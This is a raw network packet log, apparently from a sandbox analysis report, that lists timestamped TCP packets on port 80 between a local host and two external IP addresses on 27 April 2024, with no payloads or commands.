Apr 27, 2024 02:19:14.194739103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.194791079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.194823980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.194869041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.208722115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.208781004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.208834887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.208897114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.208964109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.208987951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.209047079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.209075928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.209114075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.209201097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.209274054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.209328890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.260411024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.260487080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.260487080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.264683962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.264775991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.264806986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.264883041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.264956951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.264976025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.318244934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.318312883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.318353891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.318392992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.347853899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.347910881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.347944975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.362417936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.362483978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.362485886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.363248110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.363281965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.363306046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.364869118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.364927053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.364991903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.365047932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.365073919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.365127087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.365142107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.365176916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.365209103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.365241051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.365283966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.365283966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.403322935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.403382063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.403412104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.403518915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.403572083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.403608084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.403721094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.403801918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.403831959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.403892994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.403968096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.404015064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.456258059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.456283092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.456310987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.460876942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.460927010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.460959911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.461007118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.490540981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.490606070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.536398888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.536469936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.536559105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.536576986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.536592960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.536617041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.536662102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.536665916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.536719084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.536720037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.536773920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.536849022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.536905050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.542773962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.542793036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.542829990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.542865038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.557224035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.557241917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.557280064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.557307959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.557709932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.557727098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.557754993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.557782888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.599720955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.599741936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.599797964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.599797964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.599968910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.599987984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.600018024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.600039959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.600044966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.600090027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.600143909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.600186110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.600193977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.600233078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.600269079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.600315094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.651814938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.651861906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.651870966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.651907921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.651927948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.651969910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.657172918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.657234907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.657289028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.657367945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.657404900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.657432079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.662153959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.662220955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.707467079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.707540035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.707858086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.707876921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.707894087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.707911968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.707931995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.707964897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.707988024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.708017111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.708023071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.708075047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.738368988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.738423109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.738529921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.738605976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.753216028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.753353119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.753509998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.753530025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.753592968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.795792103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.795912981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.795958996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.796149015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.796212912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.796253920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.834954977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.835035086 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.846939087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.847105980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.847124100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.847158909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.852051973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.852134943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.852233887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.852286100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.852382898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.878818035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.879292011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.879311085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.879328966 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.879374027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.879410028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.879410982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.879528046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.879568100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.879585981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.879625082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.948493004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.948512077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.948529959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.948581934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.948585033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.948606968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.948623896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.948626041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.948698997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.990556002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.990581036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.990638971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.990667105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.990748882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.990816116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.006226063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.006298065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.042197943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.042217016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.042257071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.046750069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.046807051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.046848059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.046873093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.046892881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.046941996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.050929070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.050995111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.051029921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.051048040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.051050901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.051106930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.051168919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.051265001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.051322937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.051503897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.051597118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.051600933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.051644087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.142884970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.142955065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.143105984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.143156052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.143217087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.143304110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.143340111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.143368006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.143414021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.143426895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.177879095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.177941084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.183921099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.185910940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.185930014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.185956955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.185982943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.186005116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.186054945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.222045898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222064972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222130060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.222155094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222213984 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.222239017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222280025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.222410917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222543001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222553968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.222583055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.222625971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222676039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.222708941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.222765923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.237617970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.237755060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.237806082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.242185116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.242268085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.242315054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.242403984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.242491961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.242636919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.242638111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.339198112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.339222908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.339276075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.339555025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.339615107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.339756012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.339832067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.339894056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.340008020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.349411011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.349473953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.379475117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.379535913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.381119967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.381191969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.381437063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.381743908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.381824017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.381865978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.381902933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.392625093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.392667055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.392690897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.392718077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.392721891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.392771959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.392772913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.392817974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.393270016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.393328905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.393337965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.393392086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.393404007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.393436909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.393451929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.393515110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.433326006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.433386087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.433412075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.437627077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.437706947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.437766075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.437931061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.437968969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.438020945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.480798006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.519902945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.519942045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.519990921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.520035028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.533999920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.534018993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.534080982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.534153938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.534171104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.534189939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.534207106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.534224987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.534234047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.534264088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.563735962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.563793898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.563801050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.563841105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.563859940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.563911915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.564270020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.564316034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.564318895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.564366102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.564549923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.564568043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.564584970 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.564626932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.564626932 CEST	49733	80	192.168.2.4	185.172.128.76
